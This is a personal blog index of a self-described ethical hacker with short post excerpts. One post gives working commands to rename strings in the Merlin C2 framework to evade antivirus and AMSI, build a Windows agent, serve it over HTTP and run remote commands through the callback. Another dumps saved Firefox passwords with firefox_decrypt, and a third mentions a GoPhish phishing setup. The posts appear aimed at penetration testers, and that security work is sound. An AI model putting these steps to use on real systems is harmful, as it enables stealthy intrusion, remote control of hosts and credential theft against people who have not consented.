Hi there, my name is Joost van ‘t Zand. This page serves as a bit of an overview of me and my online presence. I am currently working as a ethical hacker.

Projects

Blog posts

• Test_page

  Mar 10, 2023

• C2 Using Merlin

  Mar 9, 2020

  To use Merlin as a Command & Control server, which is written in golang, we should take the following steps:

  go version	-> version should be 1.13 or higher
  apt update && sudo apt install golang-go
  git clone https://github.com/Ne0nd0g/merlin && cd merlin
  
  
  ## Now replace ExecuteShell for MiniMice to trick virusscanners and AMSI
  ## and also hide Ne0nd0g for AMSI, as this is the developer
  find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/ExecuteShell/MiniMice/g'
  find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/executeShell/miniMice/g'
  find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g'
  sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g' go.mod
  
  
  ## Create an output directory and build the Merlin agent
  make agent-windows DIR="./output"
  
  ## Start the Merlin server listener
  go run cmd/merlinserver/main.go -i 0.0.0.0 -p 8443 -psk strongPassphraseWhaterYouWant
  
  ## Run a python HTTP Server to copy the Merlin agent to the Windows system
  cd /mnt/tools/merlin/output/
  python -m SimpleHTTPServer 80
  
  ## Run the Merlin agent on the Windows host
  merlinAgent-Windows-x64.exe -url https://172.16.216.135:8443 -psk strongPassphraseWhaterYouWant
  [+]New authenticated agent checkin for a0c86f61-4f21-4e63-9856-b73d7b8fbf3a
  
  ## Now we can interact with the agent:
  interact a0c86f61-4f21-4e63-9856-b73d7b8fbf3a
  
  help
  ls
  info
  cmd whoami

• Deploying Gophish In Docker With Terraform And Aws

  Mar 6, 2020

  Here a video about how to deploy GoPhish in a Docker container on a VPS in AWS which is deployed using TerraForm

• Dump Firefox Credentials On Macos

  Nov 11, 2019

  Dumping the credentials stored in the Firefox browser cache on MacOS is possible using the following commands:

  git clone https://github.com/unode/firefox_decrypt
  cd firefox_decrypt
  python firefox_decrypt.py
  
  Select the Firefox profile you wish to decrypt
  1 -> Profiles/1v42l6gf.dev-edition-default
  2 -> Profiles/cunynfjm.default
  2
  
  Master Password for profile /Users/myuser/Library/Application Support/Firefox/Profiles/cunynfjm.default:
  2019-11-11 14:13:18,813 - WARNING - Attempting decryption with no Master Password
  
  Website:   https://www.hackthebox.eu
  Username: '<username>'
  Password: '******'
  
  Website:   http://webmail.mijndomein.nl
  Username: '<username>'
  Password: '******'
  
  Website:   https://www.t-mobile.nl
  Username: '<username>'
  Password: '******'

• Welcome To My Blog

  Nov 7, 2019

  Welcome……You’ll find this post in your _posts directory. Go ahead and edit it and re-build the site to see your changes. You can rebuild the site in many different ways, but the most common way is to run jekyll serve, which launches a web server and auto-regenerates your site when a file is updated.

  To add new posts, simply add a file in the _posts directory that follows the convention YYYY-MM-DD-name-of-post.ext and includes the necessary front matter. Take a look at the source for this post to get an idea about how it works.

  Jekyll also offers powerful support for code snippets:

  def print_hi(name)
    puts "Hi, #{name}"
  end
  print_hi('Tom')
  #=> prints 'Hi, Tom' to STDOUT.

  Check out the Jekyll docs for more info on how to get the most out of Jekyll. File all bugs/feature requests at Jekyll’s GitHub repo. If you have questions, you can ask them on Jekyll Talk.